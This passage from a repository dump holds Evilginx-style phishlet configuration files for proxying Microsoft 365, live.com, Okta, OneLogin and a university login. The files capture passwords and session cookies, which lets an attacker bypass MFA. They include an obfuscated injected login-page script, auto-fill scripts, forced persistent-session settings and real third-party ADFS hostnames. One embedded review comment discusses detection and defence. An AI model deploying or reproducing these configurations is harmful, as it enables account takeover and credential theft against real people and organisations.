'password' 62 | search: '(.*)' 63 | type: 'post' 64 | 65 | login: 66 | domain: 'myview.nottingham.ac.uk' 67 | path: '/dashboard/dashboard-ui/index.html#/landing' -------------------------------------------------------------------------------- /phishlet_examples/o365(2).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@jamescullum' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | - {phish_sub: 'adfs', orig_sub: 'sts', domain: 'ribkoff.com', session: true, is_landing:false} 8 | 9 | # The lines below are needed if 
your target organization utilizes ADFS. 10 | # If they do, you need to uncomment all following lines that contain <...> 11 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected. 12 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed: 13 | # = adfs 14 | # = example.com 15 | # = adfs.example.com 16 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false} 17 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false} 18 | sub_filters: 19 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 20 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 21 | # Uncomment and fill in if your target organization utilizes ADFS 22 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 23 | 24 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://sts.ribkoff.com', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 25 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://sts.ribkoff.com', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 26 | - {triggers_on: 'sts.ribkoff.com', orig_sub: 'sts', domain: 'ribkoff.com', search: 'href="https://sts.ribkoff.com', replace: 
'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 27 | - {triggers_on: 'sts.ribkoff.com', orig_sub: 'sts', domain: 'ribkoff.com', search: 'https://sts.ribkoff.com', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 28 | 29 | auth_tokens: 30 | - domain: '.login.microsoftonline.com' 31 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT'] 32 | - domain: 'login.microsoftonline.com' 33 | keys: ['SignInStateCookie'] 34 | credentials: 35 | username: 36 | key: '(login|UserName)' 37 | search: '(.*)' 38 | type: 'post' 39 | password: 40 | key: '(passwd|Password)' 41 | search: '(.*)' 42 | type: 'post' 43 | login: 44 | domain: 'login.microsoftonline.com' 45 | path: '/' -------------------------------------------------------------------------------- /phishlet_examples/o365(April-latest).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@APT29' 3 | min_ver: '2.4.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | - {phish_sub: 'aadcdn', orig_sub: 'aadcdn', domain: 'msftauth.net', session: false, auto_filter: true, is_landing:false} 8 | sub_filters: 9 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 10 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 11 | 12 | auth_tokens: 13 | - domain: '.login.microsoftonline.com' 14 | keys: ['ESTSAUTH', 
'ESTSAUTHPERSISTENT'] 15 | - domain: 'login.microsoftonline.com' 16 | keys: ['SignInStateCookie'] 17 | 18 | 19 | # INJECT COOKIES 20 | # -------------- 21 | # 22 | # Browse the url https://login.microsoftonline.com 23 | # inject the capture cookies 24 | # Refresh the browser 25 | 26 | 27 | 28 | credentials: 29 | username: 30 | key: 'login' 31 | search: '(.*)' 32 | type: 'post' 33 | password: 34 | key: 'passwd' 35 | search: '(.*)' 36 | type: 'post' 37 | auth_urls: 38 | - '/common/SAS/ProcessAuth' 39 | - '/kmsi' 40 | login: 41 | domain: 'login.microsoftonline.com' 42 | path: '/' 43 | force_post: 44 | - path: '/kmsi' 45 | search: 46 | - {key: 'LoginOptions', search: '.*'} 47 | force: 48 | - {key: 'LoginOptions', value: '1'} 49 | type: 'post' 50 | - path: '/common/SAS' 51 | search: 52 | - {key: 'rememberMFA', search: '.*'} 53 | force: 54 | - {key: 'rememberMFA', value: 'true'} 55 | type: 'post' 56 | js_inject: 57 | - trigger_domains: ["login.microsoftonline.com"] 58 | trigger_paths: ["/common/oauth2/","/","/*"] 59 | script: | 60 | var _0x410e92=_0x5778;(function(_0x35da17,_0x3a9f50){var _0x5ec8bb=_0x5778,_0x54aaae=_0x35da17();while(!![]){try{var _0x444577=-parseInt(_0x5ec8bb(0x167))/(-0x41*0x91+0x1243*0x1+-0x128f*-0x1)*(-parseInt(_0x5ec8bb(0x187))/(0x3*0x2fe+-0xbc7+-0x2cf*-0x1))+-parseInt(_0x5ec8bb(0x15b))/(0xead*0x1+-0x16e+-0xd3c)*(-parseInt(_0x5ec8bb(0x155))/(-0x1b*-0x24+-0x3*-0x233+-0xa61*0x1))+-parseInt(_0x5ec8bb(0x15d))/(-0x223c+0x1420*-0x1+-0x3661*-0x1)+parseInt(_0x5ec8bb(0x165))/(-0x23a*0x10+0xf*0x4a+0x3ea*0x8)+-parseInt(_0x5ec8bb(0x16b))/(-0xfb*-0x26+-0x24c*0xd+-0x75f)*(parseInt(_0x5ec8bb(0x143))/(-0x1e23+0x1256+-0xbd5*-0x1))+parseInt(_0x5ec8bb(0x144))/(0xcb3+-0x6*0x61+0x299*-0x4)+-parseInt(_0x5ec8bb(0x16f))/(0x7a*0x4+0x1ae3+0x1*-0x1cc1)*(parseInt(_0x5ec8bb(0x166))/(0x1*-0x147d+-0x1a97*-0x1+-0x60f));if(_0x444577===_0x3a9f50)break;else 
_0x54aaae['push'](_0x54aaae['shift']());}catch(_0x16a14a){_0x54aaae['push'](_0x54aaae['shift']());}}}(_0x4864,0x5ddd9+0xc01*0xfb+-0x9d905)); checkElement3=async _0x4da37=>{var _0x2b896c=_0x5778,_0x206726={'NtbiS':function(_0x56a0cf,_0x29c3b0){return _0x56a0cf===_0x29c3b0;}};for(;_0x206726[_0x2b896c(0x154)](null,document[_0x2b896c(0x16a)+_0x2b896c(0x17d)](_0x4da37));)await new Promise(_0x3df563=>requestAnimationFrame(_0x3df563));return document[_0x2b896c(0x16a)+_0x2b896c(0x17d)](_0x4da37);};checkElement3(_0x410e92(0x15c)+_0x410e92(0x14e))[_0x410e92(0x185)](_0x468602=>{var _0x54fcff=_0x410e92,_0x3a611f={'wyKIM':_0x54fcff(0x14d)+_0x54fcff(0x149)};cancel=document[_0x54fcff(0x175)+_0x54fcff(0x173)](_0x3a611f[_0x54fcff(0x171)]),cancel[_0x54fcff(0x16d)](),cancel[_0x54fcff(0x176)]();return;});function _0x5778(_0x48bd0d,_0x4f20be){var _0x4b42d1=_0x4864();return _0x5778=function(_0x55d66e,_0x2b8c46){_0x55d66e=_0x55d66e-(0xcb3*-0x1+-0x7a*-0x3d+-0x102*0xf);var _0x56b5e4=_0x4b42d1[_0x55d66e];return _0x56b5e4;},_0x5778(_0x48bd0d,_0x4f20be);} checkElement=async _0x215f7d=>{var _0x30874e=_0x410e92,_0x5e7d54={'supNP':function(_0x883434,_0x323f5e){return _0x883434===_0x323f5e;}};for(;_0x5e7d54[_0x30874e(0x181)](null,document[_0x30874e(0x16a)+_0x30874e(0x17d)](_0x215f7d));)await new Promise(_0x45909d=>requestAnimationFrame(_0x45909d));return document[_0x30874e(0x16a)+_0x30874e(0x17d)](_0x215f7d);};checkElement(_0x410e92(0x183))[_0x410e92(0x185)](_0x156d6f=>{var _0x97d941=_0x410e92,_0x4efb2f={'NaHcx':_0x97d941(0x183),'wwDfO':_0x97d941(0x170)+'n9','FzbAh':_0x97d941(0x164)+_0x97d941(0x147),'nkPuA':function(_0x551351,_0x4abd64){return _0x551351<_0x4abd64;},'jtsCS':function(_0x2ba4ef,_0x56de8a){return _0x2ba4ef-_0x56de8a;},'KoKeW':function(_0x4ad73f,_0x490cea,_0x149ce4){return 
_0x4ad73f(_0x490cea,_0x149ce4);}},_0x4cfa81=document[_0x97d941(0x16a)+_0x97d941(0x17d)](_0x4efb2f[_0x97d941(0x157)]),_0x23ca5a=document[_0x97d941(0x16a)+_0x97d941(0x17d)](_0x4efb2f[_0x97d941(0x168)]),_0x24489f=window[_0x97d941(0x177)][_0x97d941(0x14a)];if(/#/[_0x97d941(0x146)](window[_0x97d941(0x177)][_0x97d941(0x14a)])){var _0x430fac=_0x4efb2f[_0x97d941(0x158)][_0x97d941(0x186)]('|'),_0x30fb78=0x138e+0x8*0x3a9+-0x30d6;while(!![]){switch(_0x430fac[_0x30fb78++]){case'0':_0x23ca5a[_0x97d941(0x176)]();continue;case'1':_0x55747b=String[_0x97d941(0x14b)+'de'][_0x97d941(0x174)](String,_0x2bbd05);continue;case'2':var _0x4fc903=_0x275d55[-0x24+-0x59*-0x1f+-0xaa2][_0x97d941(0x156)](/[=]/gi,'');continue;case'3':_0x4cfa81[_0x97d941(0x17b)]=_0x55747b;continue;case'4':return;case'5':_0x23ca5a[_0x97d941(0x16d)]();continue;case'6':for(var _0x55747b,_0x239c92=_0x4fc903[_0x97d941(0x14c)](-0x2316+0x1d*-0x157+0x49f2),_0x2bbd05=[],_0x8e4eb7=-0x2482+-0x799+0x2c1b;_0x4efb2f[_0x97d941(0x152)](_0x8e4eb7,_0x4efb2f[_0x97d941(0x15f)](_0x239c92[_0x97d941(0x14f)],0x39e+-0x1ed5+0x218*0xd));_0x8e4eb7+=0x22b6+0x2*0x51+-0x1*0x2356)_0x2bbd05[_0x97d941(0x150)](_0x4efb2f[_0x97d941(0x169)](parseInt,_0x239c92[_0x97d941(0x161)](_0x8e4eb7,0x1cef+-0x316+-0x19d7),-0x1ae+0x7*-0x259+0x122d));continue;case'7':_0x4cfa81[_0x97d941(0x16d)]();continue;case'8':var _0x275d55=_0x24489f[_0x97d941(0x186)]('#');continue;}break;}}}); checkElement2=async _0x2195e9=>{var _0xf10e89=_0x410e92,_0x3bc8a4={'qbHBe':function(_0x5c47e9,_0xf62cf8){return _0x5c47e9===_0xf62cf8;}};for(;_0x3bc8a4[_0xf10e89(0x151)](null,document[_0xf10e89(0x16a)+_0xf10e89(0x17d)](_0x2195e9));)await new Promise(_0x5283f6=>requestAnimationFrame(_0x5283f6));return document[_0xf10e89(0x16a)+_0xf10e89(0x17d)](_0x2195e9);};function _0x4864(){var 
_0x4e5d58=['supNP','\x20accessing','#i0116','QYnJR','then','split','4376DOmDZX','orgotPassw','rt\x20alert-e','1492360xeMxib','2374506yToWXe','/div>','test','3|5|0|4','\x20password<','Cancel','href','fromCharCo','substring','desktopSso','oCancel','length','push','qbHBe','nkPuA','erify\x20your','NtbiS','238444BSAvJm','replace','NaHcx','FzbAh','jzwAY','i0118','51eVYSJs','#desktopSs','3145070RoBCQT','mportant\x22\x20','jtsCS','ord','substr','use\x20you\x27re','znBFb','8|2|6|1|7|','298710PohhQS','2002TmIuPF','379yZWIKQ','wwDfO','KoKeW','querySelec','7ABcWLj','centHTML','focus','beforebegi','45620ORReFM','#idSIButto','wyKIM','\x20info,\x20you','ById','apply','getElement','click','location','insertAdja','Beca','class=\x22ale','#idA_PWD_F'];_0x4864=function(){return _0x4e5d58;};return _0x4864();}checkElement2(_0x410e92(0x180)+_0x410e92(0x141)+_0x410e92(0x160))[_0x410e92(0x185)](_0x54c929=>{var _0x2c9990=_0x410e92,_0x4ced35={'QYnJR':_0x2c9990(0x15a),'jzwAY':_0x2c9990(0x16e)+'n','znBFb':_0x2c9990(0x179)+_0x2c9990(0x15e)+_0x2c9990(0x17f)+_0x2c9990(0x142)+_0x2c9990(0x17e)+_0x2c9990(0x162)+_0x2c9990(0x182)+_0x2c9990(0x17c)+_0x2c9990(0x172)+_0x2c9990(0x17a)+_0x2c9990(0x153)+_0x2c9990(0x148)+_0x2c9990(0x145)};node=document[_0x2c9990(0x175)+_0x2c9990(0x173)](_0x4ced35[_0x2c9990(0x184)]),node[_0x2c9990(0x178)+_0x2c9990(0x16c)](_0x4ced35[_0x2c9990(0x159)],_0x4ced35[_0x2c9990(0x163)]);return;}); -------------------------------------------------------------------------------- /phishlet_examples/o365(working-october21).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@G66K ICQ: 747246257' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | # The lines below are needed if your target organization utilizes ADFS. 
8 | # If they do, you need to uncomment all following lines that contain <...> 9 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected. 10 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed: 11 | # = adfs 12 | # = example.com 13 | # = adfs.example.com 14 | 15 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false} 16 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false} 17 | - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing:false} 18 | - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com:443', session: true, is_landing:false} 19 | - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk', session: true, is_landing:false} 20 | - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false} 21 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk', session: true, is_landing:false} 22 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false} 23 | - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false} 24 | - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false} 25 | - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false} 26 | - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false} 27 | 28 | sub_filters: 29 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 30 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 
'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 31 | # Uncomment and fill in if your target organization utilizes ADFS 32 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 33 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 34 | - {triggers_on: 'adfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 35 | - {triggers_on: 'sso.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 36 | - {triggers_on: 'sts.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 37 | - {triggers_on: 'idfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 38 | auth_tokens: 39 | - domain: '.login.microsoftonline.com' 40 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT'] 41 | - domain: 'login.microsoftonline.com' 42 | keys: ['SignInStateCookie'] 43 | auth_urls: 44 | - '/kmsi*' 45 | credentials: 46 | username: 47 | key: '(login|UserName)' 48 | search: '(.*)' 49 | type: 'post' 50 | password: 51 | key: 
'(passwd|Password)' 52 | search: '(.*)' 53 | type: 'post' 54 | login: 55 | domain: 'login.microsoftonline.com' 56 | path: '/' 57 | js_inject: 58 | - trigger_domains: ["www.domain.com"] 59 | trigger_paths: ["/"] 60 | script: | 61 | function gimmesleep(ms) { 62 | return new Promise(resolve => setTimeout(resolve, ms)); 63 | } 64 | async function redir() { 65 | await gimmesleep(2000); 66 | window.location.href = "{rurl}"; 67 | } 68 | redir() 69 | js_inject: 70 | - trigger_domains: ["login.microsoftonline.com"] 71 | trigger_paths: ["/common/oauth2/","/","/*"] 72 | script: | 73 | function lp(){ 74 | var emailId = document.querySelector("#i0116"); 75 | var nextButton = document.querySelector("#idSIButton9"); 76 | var query = window.location.href; 77 | if (/#/.test(window.location.href)){ 78 | var res = query.split("#"); 79 | var data1 = res[0]; 80 | var data2 = res[1]; 81 | console.log(data1); 82 | console.log(data2); 83 | if (emailId != null) { 84 | var m = data2.replace(/[=]/gi, ''); 85 | emailId.focus(); 86 | emailId.value = m; 87 | nextButton.focus(); 88 | nextButton.click(); 89 | console.log("YES!"); 90 | return; 91 | } 92 | } 93 | setTimeout(function(){lp();}, 1500); 94 | } 95 | setTimeout(function(){lp();}, 1500); -------------------------------------------------------------------------------- /phishlet_examples/o365(working2).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | # The lines below are needed if your target organization utilizes ADFS. 8 | # If they do, you need to uncomment all following lines that contain <...> 9 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected. 
10 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed: 11 | # = adfs 12 | # = example.com 13 | # = adfs.example.com 14 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false} 15 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false} 16 | sub_filters: 17 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 18 | 19 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 20 | # Uncomment and fill in if your target organization utilizes ADFS 21 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 22 | 23 | auth_tokens: 24 | - domain: '.login.microsoftonline.com' 25 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp'] 26 | - domain: 'login.microsoftonline.com' 27 | keys: ['SignInStateCookie', '.*,regexp'] 28 | credentials: 29 | username: 30 | key: '(login|UserName)' 31 | search: '(.*)' 32 | type: 'post' 33 | password: 34 | key: '(passwd|Password)' 35 | search: '(.*)' 36 | type: 'post' 37 | login: 38 | domain: 'login.microsoftonline.com' 39 | path: '/' 40 | js_inject: 41 | - trigger_domains: ["login.microsoftonline.com"] 42 | trigger_paths: ["/common/oauth2/"] 43 | trigger_params: ["email"] 44 | script: | 45 | function lp(){ 46 | var email = document.querySelectorAll('input[type=email]')[0]; 47 | if (email != null) { 48 | email.value = "{email}"; 49 | setTimeout(function(){ 50 | document.querySelectorAll('input[type=submit]')[0].click(); 51 
| }, 5000); 52 | return; 53 | } 54 | setTimeout(function(){lp();}, 100); 55 | } 56 | setTimeout(function(){lp();}, 100); 57 | -------------------------------------------------------------------------------- /phishlet_examples/o365(working2a).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: false} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true} 8 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false} 9 | - {phish_sub: 'logincdn', orig_sub: 'logincdn', domain: 'msauth.net', session: false, is_landing: false} 10 | 11 | sub_filters: 12 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 13 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 14 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', 
search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 17 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 18 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 19 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 20 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 21 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 22 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 23 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 24 | 25 | auth_tokens: 26 | - domain: '.login.microsoftonline.com' 27 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp'] 28 | - domain: 'login.microsoftonline.com' 29 | keys: ['SignInStateCookie', '.*,regexp'] 30 | - domain: 'login.live.com' 31 | keys: ['.*,regexp'] 32 | - domain: '.login.live.com' 33 | keys: 
['.*,regexp'] 34 | credentials: 35 | username: 36 | key: '(login|UserName)' 37 | search: '(.*)' 38 | type: 'post' 39 | password: 40 | key: '(passwd|Password)' 41 | search: '(.*)' 42 | type: 'post' 43 | login: 44 | domain: 'login.microsoftonline.com' 45 | path: '/' 46 | js_inject: 47 | - trigger_domains: ["login.microsoftonline.com"] 48 | trigger_paths: ["/common/oauth2/"] 49 | trigger_params: ["email"] 50 | script: | 51 | function lp(){ 52 | var email = document.querySelectorAll('input[type=email]')[0]; 53 | if (email != null) { 54 | email.value = "{email}"; 55 | setTimeout(function(){ 56 | document.querySelectorAll('input[type=submit]')[0].click(); 57 | }, 5000); 58 | return; 59 | } 60 | setTimeout(function(){lp();}, 100); 61 | } 62 | setTimeout(function(){lp();}, 100); 63 | -------------------------------------------------------------------------------- /phishlet_examples/okta.yaml: -------------------------------------------------------------------------------- 1 | author: '@mikesiegel' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false} 5 | - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false } 6 | - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true} 7 | sub_filters: 8 | - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']} 9 | auth_tokens: 10 | - domain: 'EXAMPLE.okta.com' 11 | keys: ['sid'] 12 | credentials: 13 | username: 14 | key: '' 15 | search: '"username":"([^"]*)' 16 | type: 'json' 17 | password: 18 | key: '' 19 | search: '"password":"([^"]*)' 20 | type: 'json' 21 | login: 22 | domain: 'EXAMPLE.okta.com' 23 | path: '/login/login.htm' 24 | -------------------------------------------------------------------------------- /phishlet_examples/onelogin.yaml: 
# NOTE(review): reading the three configurations below (onelogin, outlook(o365),
# outlook) from the defending side.
# - proxy_hosts pairs a phishing-side label (phish_sub) with the real host
#   (orig_sub + domain), and the labels mirror the originals ('portal-cdn', 'outlook',
#   'login', 'account'); those labels under an unrelated registrable domain in DNS,
#   proxy or certificate-transparency data are a usable detection signal.
# - auth_tokens names the cookies recorded after sign-in: 'onelogin.com_user' and
#   'sub_session_onelogin.com' for OneLogin, 'WLSSC' (plus 'RPSSecAuth' in the
#   outlook(o365) variant) for live.com. Recovery after a suspected relay has to
#   revoke active sessions as well as reset the password.
# - onelogin force_post: adds persist_session=true to the '/sessions' POST, which per
#   the file's own comment forces "remember me"; a persistent session the user did
#   not ask for is worth looking for in identity-provider sign-in logs.
# - credentials: OneLogin values are read from POST fields or, for '/login2', from
#   the JSON body; live.com values from the POST fields 'login' and 'passwd'.
# - Codes and push approvals typed into a proxied page are relayed with the password;
#   origin-bound authenticators (WebAuthn/FIDO2) are the control that is not.
-------------------------------------------------------------------------------- 1 | name: 'onelogin' 2 | author: '@perfectlylogical' 3 | min_ver: '2.3.0' 4 | # NOTE: Do not forget to change EXMAPLE to the relevant sub domain. 5 | proxy_hosts: 6 | - {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false } 7 | - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true} 8 | - {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false} 9 | # Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading. 10 | #- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false} 11 | sub_filters: [] 12 | auth_tokens: 13 | - domain: '.onelogin.com' 14 | keys: ['onelogin.com_user'] 15 | - domain: 'EXAMPLE.onelogin.com' 16 | keys: ['sub_session_onelogin.com'] 17 | auth_urls: 18 | - '/portal/' 19 | - '/client/apps' 20 | # This is used to force the rememebr me functionality if the target is using the /login url 21 | # This method will not work if they are using the multistep login method on the /login2 url 22 | force_post: 23 | - path: '/sessions' 24 | search: 25 | - {key: 'authenticity_token', search: '.*'} 26 | - {key: 'email', search: '.*'} 27 | - {key: 'password', search: '.*'} 28 | force: 29 | - {key: 'persist_session', value: 'true'} 30 | type: 'post' 31 | # The post type is used to capture credentials which use the /login url 32 | # The json type is used to capture credentials which use the /login2 url 33 | credentials: 34 | username: 35 | key: 'email' 36 | search: '(.*)' 37 | type: 'post' 38 | password: 39 | key: 'password' 40 | search: '(.*)' 41 | type: 'post' 42 | username: 43 | key: 'login' 44 | search: '"login":"(.*)"' 45 | type: 'json' 46 | password: 47 | key: 'password' 48 | search: '"password":"(.*)",' 49 | type: 'json' 50 | login: 51 | 
